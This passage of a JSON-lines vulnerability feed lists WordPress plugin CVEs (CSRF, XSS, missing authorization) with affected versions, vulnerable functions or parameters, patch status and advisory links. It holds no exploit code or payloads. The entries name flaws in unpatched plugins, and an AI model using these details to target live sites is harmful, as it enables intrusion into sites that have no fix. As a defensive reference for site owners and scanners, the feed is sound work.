tags%2F1.1.9&new=2899786%40wp-responsive-thumbnail-slider%2Ftags%2F1.1.10\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4398","slug":"amministrazione-trasparente","versionImpact":"7.1","description":"The Amministrazione Trasparente plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including,  7.1. This is due to missing or incorrect nonce validation on the at_save_aturl_meta() function. This makes it possible for unauthenticated attackers to update meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6358fc29-5b09-481a-9040-a7890b61f419?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6358fc29-5b09-481a-9040-a7890b61f419?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548741%40amministrazione-trasparente&new=2548741%40amministrazione-trasparente&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548741%40amministrazione-trasparente&new=2548741%40amministrazione-trasparente&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-
plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9187","slug":"read-more","versionImpact":"1.1.8","description":"The Read more By Adam plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the deleteRm() function in all versions up to, and including, 1.1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete read more buttons.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ebc8d0d-04b6-49a0-96c1-7c6d930009d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ebc8d0d-04b6-49a0-96c1-7c6d930009d8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/read-more\\\/trunk\\\/files\\\/RadMoreAjax.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/read-more\\\/trunk\\\/files\\\/RadMoreAjax.php#L9\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9388","slug":"black-widgets","versionImpact":"1.3.7","description":"The Black Widgets For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/618c72b1-363b-41ad-939d-ab2a3b4d579c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/618c72b1-363b-41ad-939d-ab2a3b4d579c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/black-widgets\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/black-widgets\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/black-widgets\\\/trunk\\\/includes\\\/class-bw.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/black-widgets\\\/trunk\\\/includes\\\/class-bw.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178366\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178366\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31441","slug":"wp-galleria","versionImpact":"1.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in S WordPress Galleria allows Reflected XSS. This issue affects WordPress Galleria: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-galleria\\\/vulnerability\\\/wordpress-wordpress-galleria-plugin-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-galleria\\\/vulnerability\\\/wordpress-wordpress-galleria-plugin-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12734","slug":"advance-post-prefix","versionImpact":"1.1.1","description":"The Advance Post Prefix WordPress plugin through 1.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/038b44dc-0495-4f56-ae7e-c78a265aa535\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/038b44dc-0495-4f56-ae7e-c78a265aa535\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5814","slug":"profiler-what-slowing-down","versionImpact":"1.0.0","description":"The Profiler \u2013 What Slowing Down Your WP plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpsd_plugin_control() function in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to reactivate previously deactivated plugins after accessing the \"Profiler\" page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profiler-what-slowing-down\\\/trunk\\\/actions.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profiler-what-slowing-down\\\/trunk\\\/actions.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9213db60-c0c1-44a9-9b8c-621029c3a08f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9213db60-c0c1-44a9-9b8c-621029c3a08f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1029","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.3. This is due to missing or incorrect nonce validation on the regenerateSitemaps function. This makes it possible for unauthenticated attackers to regenerate Sitemaps via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/764aec73-f291-4372-9dde-812ffaf025ed\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/764aec73-f291-4372-9dde-812ffaf025ed\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2119","slug":"responsive-filterable-portfolio","versionImpact":"1.0.19","description":"The Responsive Filterable Portfolio plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.0.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e67dfe0f-ac1c-4a78-bfc9-0cfd6c3040d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e67dfe0f-ac1c-4a78-bfc9-0cfd6c3040d4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/trunk\\\/wp-responsive-images-thumbnail-slider.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/trunk\\\/wp-responsive-images-thumbnail-slider.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2808922%40responsive-filterable-portfolio%2Ftags%2F1.0.19&new=2899431%40responsive-filterable-portfolio%2Ftags%2F1.0.20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2808922%40responsive-filterable-portfolio%2Ftags%2F1.0.19&new=2899431%40responsive-filterable-portfolio%2Ftags%2F1.0.20\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4397","slug":"staff-directory-pro","versionImpact":"3.6","description":"The Staff Directory Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.6. This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to save custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548539%40staff-directory-pro&new=2548539%40staff-directory-pro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548539%40staff-directory-pro&new=2548539%40staff-directory-pro&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5971447d-0634-49a5-91d0-c4f0c0825a86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5971447d-0634-49a5-91d0-c4f0c0825a86?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43269","slug":"wp-backitup","versionImpact":"1.50","description":"Cross-Site Request Forgery (CSRF) vulnerability in WPBackItUp Backup and Restore WordPress. This issue affects Backup and Restore WordPress: from n\/a through 1.50.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-backitup\\\/wordpress-backup-and-restore-wordpress-plugin-1-50-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7489","slug":"mailchimp-wp","versionImpact":"2.5.6","description":"The Forms for Mailchimp by Optin Cat \u2013 Grow Your MailChimp List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form color parameters in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52f9db86-7fed-4b32-8384-3ceb300f9249?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52f9db86-7fed-4b32-8384-3ceb300f9249?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-functions.php#L91\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-functions.php#L91\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-functions.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-wp\\\/trunk\\\/includes\\\/eoi-functions.php#L166\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2078","slug":"blogbuzztime-for-wp","versionImpact":"1.1","description":"The BlogBuzzTime for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blogbuzztime-for-wp\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/blogbuzztime-for-wp\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/746e47f2-3fe3-439c-bd54-a9bba9c86271?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/746e47f2-3fe3-439c-bd54-a9bba9c86271?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31848","slug":"adverts-click-tracker","versionImpact":"1.4","description":"Missing Authorization vulnerability in WPFactory WordPress Adverts Plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WordPress Adverts Plugin: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/adverts-click-tracker\\\/vulnerability\\\/wordpress-wordpress-adverts-plugin-plugin-1-4-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/adverts-click-tracker\\\/vulnerability\\\/wordpress-wordpress-adverts-plugin-plugin-1-4-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12733","slug":"affiliateimportereb","versionImpact":"1.0.6","description":"The AffiliateImporterEb WordPress plugin through 1.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61be935e-ecb4-45be-8553-65877dd42569\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61be935e-ecb4-45be-8553-65877dd42569\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5925","slug":"bunnys-print-css","versionImpact":"0.95","description":"The Bunny\u2019s Print CSS plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.95. This is due to missing or incorrect nonce validation on the pcss_options_subpanel() function. This makes it possible for unauthenticated attackers to update settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bunnys-print-css\\\/trunk\\\/print-css.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bunnys-print-css\\\/trunk\\\/print-css.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53282bec-cd47-4db4-8ffe-6647521c0d49?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53282bec-cd47-4db4-8ffe-6647521c0d49?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-28975","slug":"alike","versionImpact":"3.0.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in redqteam Alike - WordPress Custom Post Comparison allows Reflected XSS. This issue affects Alike - WordPress Custom Post Comparison: from n\/a through 3.0.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/alike\\\/vulnerability\\\/wordpress-alike-wordpress-custom-post-comparison-3-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/alike\\\/vulnerability\\\/wordpress-alike-wordpress-custom-post-comparison-3-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1068","slug":"read-more-excerpt-link","versionImpact":"1.6.0","description":"The Download Read More Excerpt Link plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.0. This is due to missing or incorrect nonce validation on the read_more_excerpt_link_menu_options() function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0359434b-9d88-4a40-8e9f-ec354c8de816\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0359434b-9d88-4a40-8e9f-ec354c8de816\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2871098\\\/read-more-excerpt-link\\\/trunk\\\/read-more-excerpt-link.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2871098\\\/read-more-excerpt-link\\\/trunk\\\/read-more-excerpt-link.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2170","slug":"simple-tags","versionImpact":"3.6.4","description":"The TaxoPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Related Posts functionality in versions up to, and including, 3.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Editor+ permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2868795%40simple-tags%2Ftrunk&old=2774153%40simple-tags%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/related-posts-functions.php?rev=2674563#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-tags\\\/trunk\\\/inc\\\/related-posts-functions.php?rev=2674563#L155\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e98ed932-4e4c-4127-ae72-500e2a34f371?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e98ed932-4e4c-4127-ae72-500e2a34f371?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4396","slug":"rucy","versionImpact":"0.4.4","description":"The Rucy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 0.4.4. This is due to missing or incorrect nonce validation on the save_rc_post_meta() function. This makes it possible for unauthenticated attackers to save post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rucy\\\/trunk\\\/inc\\\/class-rucy-editor.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rucy\\\/trunk\\\/inc\\\/class-rucy-editor.php#L237\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/595d0401-55b9-418e-8b99-48b23e9a2662?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/595d0401-55b9-418e-8b99-48b23e9a2662?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
